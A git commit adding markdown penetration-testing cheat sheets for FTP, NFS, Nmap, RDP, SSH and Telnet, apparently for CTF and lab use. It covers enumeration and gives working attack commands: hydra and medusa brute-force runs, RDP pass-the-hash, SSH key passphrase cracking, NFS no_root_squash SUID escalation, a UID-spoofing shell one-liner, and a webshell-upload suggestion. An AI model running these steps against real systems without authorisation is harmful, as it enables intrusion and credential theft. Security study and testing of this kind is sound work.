This commit is contained in:
Hadi
2026-08-28 11:45:23 +02:00
commit 54fed22b8b
28 changed files with 1884 additions and 0 deletions
+71
View File
@@ -0,0 +1,71 @@
---
title: "FTP"
description: "Enumeration, exploitation and post-exploitation techniques for FTP servers."
tags: ["ftp", "network", "service"]
publishDate: 2026-04-29
---
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
- [Enumeration](#enumeration)
- [Banner grabbing](#banner-grabbing)
- [Nmap](#nmap)
- [Anonymous Login](#anonymous-login)
- [Brute Force](#brute-force)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
FTP runs on **port 21** (control) and uses a secondary data channel (port 20 for active, ephemeral port for passive).
Common implementations: vsftpd, ProFTPD, Pure-FTPd, FileZilla Server, IIS FTP.
## Enumeration
### Banner grabbing
```bash
nc -nv $IP 21
ftp $IP
```
The banner often reveals the software version: cross-reference with CVE databases.
### Nmap
```bash
nmap -sV -p 21 $IP
nmap -p 21 --script ftp-* $IP
```
Key scripts:
- `ftp-anon`: checks anonymous login
- `ftp-bounce`: tests for FTP bounce attack
- `ftp-brute`: brute-force credentials
- `ftp-syst`: retrieves system info
## Anonymous Login
```bash
ftp $IP
# Username: anonymous
# Password: <empty> or anonymous@
```
If allowed, list and download everything:
```bash
ls -la
mget *
```
Check for writable directories: you may be able to upload a webshell if FTP root overlaps with a web root.
## Brute Force
```bash
hydra -l $user -P ~/wordlists/rockyou.txt ftp://$IP
medusa -h $IP -u $user -P ~/wordlists/rockyou.txt -M ftp
```
Try default credentials first: `admin:admin`, `ftp:ftp`, `user:password`.
+92
View File
@@ -0,0 +1,92 @@
---
title: "NFS"
description: "Enumeration, mounting and privilege escalation techniques for NFS shares."
tags: ["nfs", "network", "service"]
publishDate: 2026-05-18
---
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
- [Enumeration](#enumeration)
- [Nmap](#nmap)
- [List shares](#list-shares)
- [Mount](#mount)
- [Privilege Escalation](#privilege-escalation)
- [no_root_squash](#no_root_squash)
- [UID spoofing](#uid-spoofing)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
NFS (Network File System) runs on **port 2049** and allows remote filesystem mounting over the network.
Common on Linux/Unix environments. Access control is defined in `/etc/exports` on the server.
## Enumeration
### Nmap
```bash
nmap -sV -p 111,2049 $IP
nmap -p 111,2049 --script nfs-* $IP
```
Key scripts:
- `nfs-showmount`: lists exported shares
- `nfs-ls`: lists files in shares
- `nfs-statfs`: retrieves disk stats
### List shares
```bash
showmount -e $IP
rpcinfo -p $IP
```
## Mount
```bash
mkdir /mnt/nfs
mount -t nfs $IP:/share /mnt/nfs
mount -t nfs -o vers=2 $IP:/share /mnt/nfs # force NFSv2
umount /mnt/nfs
```
## Privilege Escalation
### no_root_squash
If the share is exported with `no_root_squash`, the remote root user keeps root privileges on the share.
Check `/etc/exports` on the server (if readable):
```bash
cat /etc/exports
```
Look for:
```
/share *(rw,no_root_squash)
```
If present, copy a SUID binary onto the share as root from your attacker machine:
```bash
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
```
Then execute it on the target with `-p` to keep the SUID effective UID:
```bash
/tmp/nfs/bash -p
```
### UID spoofing
NFS authenticates by UID. If you know a file is owned by UID 1001 on the server, impersonate it directly:
```bash
python3 -c "import os; os.setuid(1001); os.system('/bin/bash')"
```
+123
View File
@@ -0,0 +1,123 @@
---
title: "Nmap"
description: "Host discovery, port scanning, service detection and NSE scripting"
tags: ["nmap", "network", "enumeration"]
publishDate: 2026-05-18
---
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
- [Host Discovery](#host-discovery)
- [Port Scanning](#port-scanning)
- [Service & Version Detection](#service--version-detection)
- [OS Detection](#os-detection)
- [Aggressive Scan](#aggressive-scan)
- [Timing Templates](#timing-templates)
- [NSE Scripts](#nse-scripts)
- [Output Formats](#output-formats)
- [Common Profiles](#common-profiles)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
Nmap is a network scanner used for host discovery, port scanning, service/version detection, OS fingerprinting, and vulnerability scripting via NSE.
## Host Discovery
```bash
nmap -sn 192.168.1.0/24 # ping sweep, no port scan
nmap -sn -PR 192.168.1.0/24 # ARP ping (local network)
nmap -Pn $IP # skip host discovery, treat as up
```
## Port Scanning
```bash
nmap $IP # top 1000 ports (SYN scan if root)
nmap -p 80,443,8080 $IP # specific ports
nmap -p 1-65535 $IP # all ports
nmap -p- $IP # shorthand for all ports
nmap -sU $IP # UDP scan
nmap -sU -sS $IP # UDP + SYN together
```
Scan types:
- `-sS`: SYN scan (stealth, requires root)
- `-sT`: TCP connect scan (no root needed)
- `-sU`: UDP scan
- `-sA`: ACK scan (firewall rule mapping)
- `-sN/sF/sX`: Null, FIN, Xmas (evasion, unreliable on Windows)
## Service & Version Detection
```bash
nmap -sV $IP
nmap -sV --version-intensity 9 $IP # more aggressive probing
```
## OS Detection
```bash
nmap -O $IP
nmap -O --osscan-guess $IP # guess if not confident
```
## Aggressive Scan
```bash
nmap -A $IP # -sV -O --script=default --traceroute
```
## Timing Templates
```bash
nmap -T0 $IP # paranoid (IDS evasion, very slow)
nmap -T1 $IP # sneaky
nmap -T3 $IP # normal (default)
nmap -T4 $IP # aggressive (faster, good for CTFs)
nmap -T5 $IP # insane (may miss results)
```
## NSE Scripts
```bash
nmap --script default $IP
nmap --script vuln $IP
nmap --script "ftp-*" $IP
nmap --script safe $IP
nmap --script $script --script-args user=$user,pass=$password $IP
```
Common script categories: `auth`, `brute`, `default`, `discovery`, `dos`, `exploit`, `intrusive`, `safe`, `version`, `vuln`.
Scripts are located in `/usr/share/nmap/scripts/`.
## Output Formats
```bash
nmap -oN output.txt $IP # normal
nmap -oX output.xml $IP # XML
nmap -oG output.gnmap $IP # grepable
nmap -oA output $IP # all three at once
```
## Common Profiles
Quick full scan:
```bash
nmap -p- -T4 --min-rate 5000 -sV -sC -oA full $IP
```
CTF/lab initial recon:
```bash
nmap -sV -sC -p- --open $IP
```
UDP top ports:
```bash
nmap -sU --top-ports 100 $IP
```
+54
View File
@@ -0,0 +1,54 @@
---
title: "RDP"
description: "Enumeration, exploitation and post-exploitation techniques for RDP servers."
tags: ["rdp", "network", "service"]
publishDate: 2026-05-04
---
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
- [Enumeration](#enumeration)
- [Banner grabbing](#banner-grabbing)
- [Connect](#connect)
- [Brute Force](#brute-force)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session.
Common on Windows servers and workstations.
## Enumeration
### Banner grabbing
```bash
nmap -sV -p 3389 $IP
nmap -p 3389 --script rdp-* $IP
```
Key scripts:
- `rdp-enum-encryption`: checks encryption level
- `rdp-vuln-ms12-020`: tests for MS12-020 DoS vulnerability
## Connect
```bash
xfreerdp /u:$user /p:$password /v:$IP
xfreerdp /u:$user /p:$password /v:$IP /cert:ignore
rdesktop $IP
```
Pass the hash directly (no plaintext password needed):
```bash
xfreerdp /u:$user /pth:$hash /v:$IP
```
## Brute Force
```bash
hydra -l $user -P ~/wordlists/rockyou.txt rdp://$IP
crowbar -b rdp -s $IP/32 -u $user -C ~/wordlists/rockyou.txt
```
+85
View File
@@ -0,0 +1,85 @@
---
title: "SSH"
description: "Enumeration, exploitation and post-exploitation techniques for SSH servers."
tags: ["ssh", "network", "service"]
publishDate: 2026-05-04
---
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
- [Enumeration](#enumeration)
- [Banner grabbing](#banner-grabbing)
- [Nmap](#nmap)
- [Connect](#connect)
- [Brute Force](#brute-force)
- [Key-Based Auth](#key-based-auth)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
SSH runs on **port 22** and provides an encrypted remote shell.
Common implementations: OpenSSH, Dropbear, Bitvise.
## Enumeration
### Banner grabbing
```bash
nc -nv $IP 22
ssh $IP
```
The banner reveals the software and version (e.g. `OpenSSH_9.2`).
### Nmap
```bash
nmap -sV -p 22 $IP
nmap -p 22 --script ssh-* $IP
```
Key scripts:
- `ssh-hostkey`: retrieves the server's public key
- `ssh-auth-methods`: lists accepted authentication methods
- `ssh-brute`: brute-force credentials
## Connect
```bash
ssh $user@$IP
ssh -p 2222 $user@$IP
ssh -i id_rsa $user@$IP
```
## Brute Force
```bash
hydra -l $user -P ~/wordlists/rockyou.txt ssh://$IP
medusa -h $IP -u $user -P ~/wordlists/rockyou.txt -M ssh
```
Only viable if password auth is enabled. Check with:
```bash
ssh -v $user@$IP
```
Look for `publickey,password` in the output.
## Key-Based Auth
If you find a private key (`id_rsa`), set permissions and connect:
```bash
chmod 600 id_rsa
ssh -i id_rsa $user@$IP
```
If the key is encrypted, crack the passphrase:
```bash
ssh2john id_rsa > hash.txt
john hash.txt --wordlist=~/wordlists/rockyou.txt
hashcat -m 22921 hash.txt ~/wordlists/rockyou.txt
```
+61
View File
@@ -0,0 +1,61 @@
---
title: "Telnet"
description: "Enumeration, exploitation and post-exploitation techniques for Telnet servers."
tags: ["telnet", "network", "service"]
publishDate: 2026-05-04
---
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
- [Enumeration](#enumeration)
- [Banner grabbing](#banner-grabbing)
- [Nmap](#nmap)
- [Connect](#connect)
- [Brute Force](#brute-force)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
Telnet runs on **port 23** and transmits all data (including credentials) in **cleartext**.
Common on embedded devices, legacy systems, routers, and IoT equipment.
## Enumeration
### Banner grabbing
```bash
nc -nv $IP 23
telnet $IP
```
The banner often reveals the OS, hostname, or device type.
### Nmap
```bash
nmap -sV -p 23 $IP
nmap -p 23 --script telnet-* $IP
```
Key scripts:
- `telnet-ntlm-info`: extracts NTLM info (Windows targets)
- `telnet-brute`: brute-force credentials
## Connect
```bash
telnet $IP
telnet $IP 23
```
Login with `user` / `password`. Session is fully interactive once authenticated.
## Brute Force
```bash
hydra -l $user -P ~/wordlists/rockyou.txt telnet://$IP
medusa -h $IP -u $user -P ~/wordlists/rockyou.txt -M telnet
```
Try default credentials first. Routers and embedded devices commonly ship with `admin:admin`, `root:root`, or blank passwords.